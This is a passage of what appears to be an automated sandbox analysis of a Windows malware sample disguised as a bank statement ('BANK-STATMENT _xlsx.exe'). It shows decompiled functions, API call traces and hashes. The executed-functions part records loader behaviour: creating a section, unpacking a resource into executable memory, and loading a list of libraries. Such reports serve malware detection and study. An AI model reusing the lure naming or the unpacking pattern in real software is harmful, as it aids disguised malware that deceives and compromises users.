                                                                                				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
                                                                                					_v368 =  *(_t89 + 0xc);
                                                                                					_v364 = 5;
                                                                                					_v360 = _v8;
                                                                                					_v356 = 0xb;
                                                                                					_v352 = _t110;
                                                                                					_v348 = 5;
                                                                                					_t60 =  *0x486d30; // 0x4074bc
                                                                                					E00406520(_t60,  &_v372);
                                                                                					E0040A0EC(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
                                                                                				} else {
                                                                                					_v332 =  *(_t89 + 0xc);
                                                                                					_v328 = 5;
                                                                                					E00404588( &_v340, 0x105,  &_v297);
                                                                                					E00408A10(_v340,  &_v336);
                                                                                					_v324 = _v336;
                                                                                					_v320 = 0xb;
                                                                                					_v316 = _v8;
                                                                                					_v312 = 0xb;
                                                                                					_v308 = _t110;
                                                                                					_v304 = 5;
                                                                                					_t82 =  *0x486cdc; // 0x40756c
                                                                                					E00406520(_t82,  &_v344);
                                                                                					E0040A0EC(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
                                                                                				}
                                                                                				_pop(_t101);
                                                                                				 *[fs:eax] = _t101;
                                                                                				_push(E0040A686);
                                                                                				E00404320( &_v372);
                                                                                				E00404344( &_v344, 3);
                                                                                				return E00404320( &_v8);
                                                                                			}

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A67F), ref: 0040A52F
                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A67F), ref: 0040A551
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileLoadModuleNameQueryStringVirtual
                                                                                • String ID: lu@
                                                                                • API String ID: 902310565-2585274229
                                                                                • Opcode ID: 7b17a811859c93707dfb15206b41d5fa76ba35a1cd5d73a52b60511870c90dc5
                                                                                • Instruction ID: 1868f2d57648088d78e42551569d2a182e29cfcd79893dd67f987c243af7d502
                                                                                • Opcode Fuzzy Hash: 7b17a811859c93707dfb15206b41d5fa76ba35a1cd5d73a52b60511870c90dc5
                                                                                • Instruction Fuzzy Hash: BD411730900658DFDB60DF64CC81BDAB7F4AB49304F4144EAE508AB295D778AE84CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E004489F4(intOrPtr __eax, void* __edx) {
                                                                                				char _v8;
                                                                                				signed short _v10;
                                                                                				intOrPtr _v16;
                                                                                				char _v17;
                                                                                				char _v24;
                                                                                				intOrPtr _t34;
                                                                                				intOrPtr _t40;
                                                                                				intOrPtr _t42;
                                                                                				intOrPtr _t48;
                                                                                				void* _t51;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t67;
                                                                                				void* _t69;
                                                                                				void* _t71;
                                                                                				intOrPtr _t72;
                                                                                
                                                                                				_t69 = _t71;
                                                                                				_t72 = _t71 + 0xffffffec;
                                                                                				_t51 = __edx;
                                                                                				_v16 = __eax;
                                                                                				_v10 =  *((intOrPtr*)(__edx + 4));
                                                                                				if(_v10 == 0) {
                                                                                					return 0;
                                                                                				} else {
                                                                                					if(GetKeyState(0x10) < 0) {
                                                                                						_v10 = _v10 + 0x2000;
                                                                                					}
                                                                                					if(GetKeyState(0x11) < 0) {
                                                                                						_v10 = _v10 + 0x4000;
                                                                                					}
                                                                                					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
                                                                                						_v10 = _v10 + 0x8000;
                                                                                					}
                                                                                					_v24 =  *((intOrPtr*)(_v16 + 0x34));
                                                                                					_t34 =  *0x487bf0; // 0x2290e50
                                                                                					E00425F8C(_t34,  &_v24);
                                                                                					_push(_t69);
                                                                                					_push(0x448af2);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t72;
                                                                                					while(1) {
                                                                                						_v17 = 0;
                                                                                						_v8 = E004486F8(_v16, 2, _v10 & 0x0000ffff);
                                                                                						if(_v8 != 0) {
                                                                                							break;
                                                                                						}
                                                                                						if(_v24 == 0 || _v17 != 2) {
                                                                                							_pop(_t64);
                                                                                							 *[fs:eax] = _t64;
                                                                                							_push(0x448af9);
                                                                                							_t40 =  *0x487bf0; // 0x2290e50
                                                                                							return E00425F84(_t40);
                                                                                						} else {
                                                                                							continue;
                                                                                						}
                                                                                						goto L14;
                                                                                					}
                                                                                					_t42 =  *0x487bf0; // 0x2290e50
                                                                                					E00425F8C(_t42,  &_v8);
                                                                                					_push(_t69);
                                                                                					_push(0x448ac7);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t72;
                                                                                					_v17 = E004488A0( &_v8, 0, _t69);
                                                                                					_pop(_t67);
                                                                                					 *[fs:eax] = _t67;
                                                                                					_push(0x448ace);
                                                                                					_t48 =  *0x487bf0; // 0x2290e50
                                                                                					return E00425F84(_t48);
                                                                                				}
                                                                                				L14:
                                                                                			}

                                                                                APIs
                                                                                • GetKeyState.USER32(00000010), ref: 00448A18
                                                                                • GetKeyState.USER32(00000011), ref: 00448A2A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: State
                                                                                • String ID:
                                                                                • API String ID: 1649606143-3916222277
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 59%
                                                                                			E00424428(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _t62;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t67;
                                                                                				void* _t77;
                                                                                				void* _t78;
                                                                                				intOrPtr _t79;
                                                                                				intOrPtr _t80;
                                                                                
                                                                                				_t77 = _t78;
                                                                                				_t79 = _t78 + 0xfffffff8;
                                                                                				_v8 = __eax;
                                                                                				_v12 = E00403584(1);
                                                                                				_push(_t77);
                                                                                				_push(0x4244af);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t79;
                                                                                				 *((intOrPtr*)(_v12 + 8)) = __edx;
                                                                                				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
                                                                                				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
                                                                                				_t80 = _t79 + 0xc;
                                                                                				 *((char*)(_v12 + 0x70)) = _a8;
                                                                                				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
                                                                                					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
                                                                                				}
                                                                                				_t62 =  *0x4120e4; // 0x412130
                                                                                				 *((intOrPtr*)(_v12 + 0x6c)) = E00403764(_a4, _t62);
                                                                                				_pop(_t64);
                                                                                				 *[fs:eax] = _t64;
                                                                                				_push(0x487a44);
                                                                                				L00406840();
                                                                                				_push(_t77);
                                                                                				_push(0x42450f);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t80;
                                                                                				E00422EBC( *((intOrPtr*)(_v8 + 0x28)));
                                                                                				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
                                                                                				E00422EB8(_v12);
                                                                                				_pop(_t67);
                                                                                				 *[fs:eax] = _t67;
                                                                                				_push(E00424516);
                                                                                				_push(0x487a44);
                                                                                				L00406988();
                                                                                				return 0;
                                                                                			}













                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(00487A44,00000000,?,?), ref: 004244CB
                                                                                • RtlLeaveCriticalSection.KERNEL32(00487A44,00424516,00487A44,00000000,?,?), ref: 00424509
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID: 0!A
                                                                                • API String ID: 3168844106-1450072167
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00435A5C(void* __eflags, intOrPtr _a4) {
                                                                                				char _v5;
                                                                                				struct tagRECT _v21;
                                                                                				struct tagRECT _v40;
                                                                                				void* _t40;
                                                                                				void* _t45;
                                                                                
                                                                                				_v5 = 1;
                                                                                				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
                                                                                				_t45 = E00414000( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
                                                                                				if(_t45 <= 0) {
                                                                                					L5:
                                                                                					_v5 = 0;
                                                                                				} else {
                                                                                					do {
                                                                                						_t45 = _t45 - 1;
                                                                                						_t40 = E00413FA4(_t44, _t45);
                                                                                						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                                                                                							goto L4;
                                                                                						} else {
                                                                                							E00435040(_t40,  &_v40);
                                                                                							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                                                                                							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                                                                                								goto L4;
                                                                                							}
                                                                                						}
                                                                                						goto L6;
                                                                                						L4:
                                                                                					} while (_t45 > 0);
                                                                                					goto L5;
                                                                                				}
                                                                                				L6:
                                                                                				return _v5;
                                                                                			}









                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Rect$EqualIntersect
                                                                                • String ID: @
                                                                                • API String ID: 3291753422-2766056989
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 54%
                                                                                			E0044C690(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v16;
                                                                                				intOrPtr _t12;
                                                                                				intOrPtr _t16;
                                                                                				intOrPtr _t23;
                                                                                				char _t24;
                                                                                				intOrPtr _t25;
                                                                                				intOrPtr _t26;
                                                                                				void* _t30;
                                                                                				void* _t31;
                                                                                				intOrPtr _t32;
                                                                                
                                                                                				_t30 = _t31;
                                                                                				_t32 = _t31 + 0xfffffff4;
                                                                                				_v8 = 0;
                                                                                				_t23 =  *0x46bb24; // 0x0
                                                                                				_v12 = _t23;
                                                                                				_t24 =  *0x46bb30; // 0x0
                                                                                				_v16 = _t24;
                                                                                				 *0x46bb24 = __eax;
                                                                                				 *0x46bb30 = 0;
                                                                                				_push(_t30);
                                                                                				_push(0x44c733);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t32;
                                                                                				_push(_t30);
                                                                                				_push(0x44c6fc);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t32;
                                                                                				_push(0);
                                                                                				_push(E0044C640);
                                                                                				_push(GetCurrentThreadId());
                                                                                				L00406DA8();
                                                                                				_t12 =  *0x46bb30; // 0x0
                                                                                				_v8 = _t12;
                                                                                				_pop(_t25);
                                                                                				 *[fs:eax] = _t25;
                                                                                				_pop(_t26);
                                                                                				 *[fs:eax] = _t26;
                                                                                				_push(0x44c73a);
                                                                                				_t5 =  &_v16; // 0x42ea72
                                                                                				 *0x46bb30 =  *_t5;
                                                                                				_t16 = _v12;
                                                                                				 *0x46bb24 = _t16;
                                                                                				return _t16;
                                                                                			}
















                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0044C6DF
                                                                                • 72E7AC10.USER32(00000000,0044C640,00000000,00000000,0044C6FC,?,00000000,0044C733), ref: 0044C6E5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID: rB
                                                                                • API String ID: 2882836952-3432471736
                                                                                • Opcode ID: a2ed862f726dce6ea9b7ab6a43d9daf756f3b3595bf60e5d1b422f0ddc4ac1ab
                                                                                • Instruction ID: 784cd37228573f0c4d139dee04941cc700bad5c37d42a676d98ffa6d26d47428
                                                                                • Opcode Fuzzy Hash: a2ed862f726dce6ea9b7ab6a43d9daf756f3b3595bf60e5d1b422f0ddc4ac1ab
                                                                                • Instruction Fuzzy Hash: C801C4B4A05704AFE301CF65DC51916BBF8EB8DB10B628476E800D3B60F7746400CE5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E0042641C(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t15;
                                                                                				void* _t16;
                                                                                				intOrPtr _t18;
                                                                                				signed int _t19;
                                                                                				void* _t20;
                                                                                				intOrPtr _t21;
                                                                                
                                                                                				_t19 = _a12;
                                                                                				if( *0x487abf != 0) {
                                                                                					_t16 = 0;
                                                                                					if((_t19 & 0x00000003) != 0) {
                                                                                						L7:
                                                                                						_t16 = 0x12340042;
                                                                                					} else {
                                                                                						_t21 = _a4;
                                                                                						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                                                                                							goto L7;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_t18 =  *0x487aa0; // 0x42641c
                                                                                					 *0x487aa0 = E00426184(3, _t15, _t18, _t19, _t20);
                                                                                					_t16 =  *0x487aa0(_a4, _a8, _t19);
                                                                                				}
                                                                                				return _t16;
                                                                                			}














                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 0042646A
                                                                                • GetSystemMetrics.USER32 ref: 0042647C
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MetricsSystem$AddressProc
                                                                                • String ID: MonitorFromPoint
                                                                                • API String ID: 1792783759-1072306578
                                                                                • Opcode ID: d416c4985ba4413774987f096a320964d63c72627901ada663c10769bb17c054
                                                                                • Instruction ID: cd85fc9c8645eeba43d65e48dc59c82577749165faf05199f4873ef963c6ea0d
                                                                                • Opcode Fuzzy Hash: d416c4985ba4413774987f096a320964d63c72627901ada663c10769bb17c054
                                                                                • Instruction Fuzzy Hash: 2F01A231305224AFDB006F51EC84B5FBB55EB40758F91442AF9598B612C375DE40C7AC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E004262F4(intOrPtr* _a4, signed int _a8) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr* _t14;
                                                                                				intOrPtr _t16;
                                                                                				signed int _t17;
                                                                                				void* _t18;
                                                                                				void* _t19;
                                                                                
                                                                                				_t17 = _a8;
                                                                                				_t14 = _a4;
                                                                                				if( *0x487abe != 0) {
                                                                                					_t19 = 0;
                                                                                					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                                                                                						_t19 = 0x12340042;
                                                                                					}
                                                                                				} else {
                                                                                					_t16 =  *0x487a9c; // 0x4262f4
                                                                                					 *0x487a9c = E00426184(2, _t14, _t16, _t17, _t18);
                                                                                					_t19 =  *0x487a9c(_t14, _t17);
                                                                                				}
                                                                                				return _t19;
                                                                                			}













                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 00426345
                                                                                • GetSystemMetrics.USER32 ref: 00426351
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MetricsSystem$AddressProc
                                                                                • String ID: MonitorFromRect
                                                                                • API String ID: 1792783759-4033241945
                                                                                • Opcode ID: f6389e7ca689c4f8fe7b67f29ea4c7e91d631a6b7a859c0c381da6731af0c2b2
                                                                                • Instruction ID: 2649c8152ff0a4a618a293e30726504c2b2cf717a0c2621c365be1b3126a70b4
                                                                                • Opcode Fuzzy Hash: f6389e7ca689c4f8fe7b67f29ea4c7e91d631a6b7a859c0c381da6731af0c2b2
                                                                                • Instruction Fuzzy Hash: E501A232B041249BDB10CB59FC85B1EB765E741764FA5846BEC08CB603C678DD40CBAC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E0043D724(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4) {
                                                                                				intOrPtr _v8;
                                                                                				char _v12;
                                                                                				char _v16;
                                                                                				void* _t22;
                                                                                				void* _t28;
                                                                                
                                                                                				_v8 = __ecx;
                                                                                				_t28 = __eax;
                                                                                				_t22 = 0;
                                                                                				if(E00442554(__eax) != 0) {
                                                                                					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
                                                                                					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
                                                                                						E0043D788(_t28, _t32);
                                                                                						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
                                                                                						_t5 =  &_a4; // 0x43375c
                                                                                						E0043D514(__edx,  *_t5, _v8,  &_v16);
                                                                                						_t7 =  &_v12; // 0x43375c
                                                                                						_push( *_t7);
                                                                                						_push(_v16);
                                                                                						_push( *((intOrPtr*)(_t28 + 0x6c)));
                                                                                						L004260FC();
                                                                                						asm("sbb ebx, ebx");
                                                                                						_t22 = __edx + 1;
                                                                                					}
                                                                                				}
                                                                                				return _t22;
                                                                                			}









                                                                                APIs
                                                                                  • Part of subcall function 0043D788: 734518F0.COMCTL32(?,00000000,0043D74D,00000000,00000000,00000000), ref: 0043D7A0
                                                                                  • Part of subcall function 0043D514: ClientToScreen.USER32(?,0043D7D0), ref: 0043D52C
                                                                                  • Part of subcall function 0043D514: GetWindowRect.USER32 ref: 0043D536
                                                                                • 73451850.COMCTL32(?,?,\7C,?,00000000,00000000,00000000), ref: 0043D76F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: 73451873451850ClientRectScreenWindow
                                                                                • String ID: \7C$\7C
                                                                                • API String ID: 1718620977-1242633874
                                                                                • Opcode ID: 365f2af23587cf31549f760d55cd3af2694efc9b2ed9bdd57577858ccde5046b
                                                                                • Instruction ID: a175693acc41a737ad07227ac984dcca9a23f6f09638294ce6bc0965f6750621
                                                                                • Opcode Fuzzy Hash: 365f2af23587cf31549f760d55cd3af2694efc9b2ed9bdd57577858ccde5046b
                                                                                • Instruction Fuzzy Hash: 9DF04F76B00209AB8B10DEAE98C18AEF3ACAB4C214B00817AF918D3301D675ED058B94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E00433464(struct tagPOINT* __eax) {
                                                                                				struct HWND__* _t8;
                                                                                				void* _t9;
                                                                                
                                                                                				_push(__eax->y);
                                                                                				_t8 = WindowFromPoint( *__eax);
                                                                                				if(_t8 != 0) {
                                                                                					while(E0043341C(_t8, _t9) == 0) {
                                                                                						_t8 = GetParent(_t8);
                                                                                						if(_t8 != 0) {
                                                                                							continue;
                                                                                						}
                                                                                						goto L3;
                                                                                					}
                                                                                				}
                                                                                				L3:
                                                                                				return _t8;
                                                                                			}






                                                                                APIs
                                                                                • WindowFromPoint.USER32(M3C,?,00000000,00433046,?,-0000000C,?), ref: 0043346A
                                                                                  • Part of subcall function 0043341C: GlobalFindAtomA.KERNEL32 ref: 00433430
                                                                                  • Part of subcall function 0043341C: GetPropA.USER32 ref: 00433447
                                                                                • GetParent.USER32(00000000), ref: 00433481
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AtomFindFromGlobalParentPointPropWindow
                                                                                • String ID: M3C
                                                                                • API String ID: 3524704154-2629677723
                                                                                • Opcode ID: 98702e36936e0e1a5cccc6fada8a93c2d553a3460fb0d51efd6170255a84fd1d
                                                                                • Instruction ID: faf4f0c274cddd3732b65d19d4330b845a9b5ea9ebc25192a453e9e8282a3d01
                                                                                • Opcode Fuzzy Hash: 98702e36936e0e1a5cccc6fada8a93c2d553a3460fb0d51efd6170255a84fd1d
                                                                                • Instruction Fuzzy Hash: 6FD0C7613007021B9F133FA55DC151765885F3D34A700A47EB5016F363DE6ECD181718
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                APIs
                                                                                • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 00490186
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CreateSection
                                                                                • String ID:
                                                                                • API String ID: 2449625523-0
                                                                                • Opcode ID: 7d616a8db5d0448a1420d80fb182250f662ec4d9038a6abcd0da5041a7f62d4b
                                                                                • Instruction ID: ed1f788a04a4fc99dfff4fe9cab51899918aac264c76607bbf74846170423289
                                                                                • Opcode Fuzzy Hash: 7d616a8db5d0448a1420d80fb182250f662ec4d9038a6abcd0da5041a7f62d4b
                                                                                • Instruction Fuzzy Hash: 6BF04F36101519AFCF029F95EC0089B3BA9FB5A360718443AFA15D7220CB3AD821DFA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: LibraryLoad$_memset
                                                                                • String ID: Culture.dll$Gdiplus.dll$advapi32.dll$diasymreader.dll$iphlpapi.dll$mscordacwks.dll$mscoree.dll$mscorjit.dll$mscorrc.dll$mscorsec.dll$mscorwks.dll$ole32.dll$shfolder.dll$sxs.dll$user32.dll
                                                                                • API String ID: 240438931-1803115895
                                                                                • Opcode ID: 73c82d8e3b47b951a9f4cc2f9c00e8973089907e2b92cb79419427843c3ae47d
                                                                                • Instruction ID: c0dabbacc67b2d426725778b490ac06bdd95f5667b4ab04c32cf67e49d091f9b
                                                                                • Opcode Fuzzy Hash: 73c82d8e3b47b951a9f4cc2f9c00e8973089907e2b92cb79419427843c3ae47d
                                                                                • Instruction Fuzzy Hash: 1D315AB1811219FBCF10DF98DA485EEBBB4EF48318F108466E405BB200D3B89A49CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00490039: GetModuleHandleW.KERNEL32(00000000), ref: 00490042
                                                                                  • Part of subcall function 00490039: FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 00490056
                                                                                  • Part of subcall function 00490039: SizeofResource.KERNEL32(00000000,00000000), ref: 00490064
                                                                                  • Part of subcall function 00490039: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0049007B
                                                                                  • Part of subcall function 00490039: LoadResource.KERNEL32(00000000,00000000), ref: 00490085
                                                                                  • Part of subcall function 0048FED9: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0048FF04
                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00490848
                                                                                • VirtualProtect.KERNEL32(00000000,00001000,00000004,?), ref: 00490868
                                                                                  • Part of subcall function 0048FF82: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0048FFAD
                                                                                • _memset.LIBCMT ref: 0049089F
                                                                                  • Part of subcall function 0048F834: _memset.LIBCMT ref: 0048F869
                                                                                • _memset.LIBCMT ref: 004908F7
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 00490919
                                                                                • _memset.LIBCMT ref: 00490945
                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0049097B
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0049099D
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe,00000104), ref: 004909DA
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe,00000104), ref: 004909E7
                                                                                • CloseHandle.KERNEL32 ref: 00490A54
                                                                                Strings
                                                                                • C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, xrefs: 004909CF
                                                                                • C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, xrefs: 004909E1
                                                                                • `I, xrefs: 00490825
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: File$ModuleVirtual_memset$AllocHandleResource$Name$CloseCreateExistsFindLoadPathProtectSizeSizeof
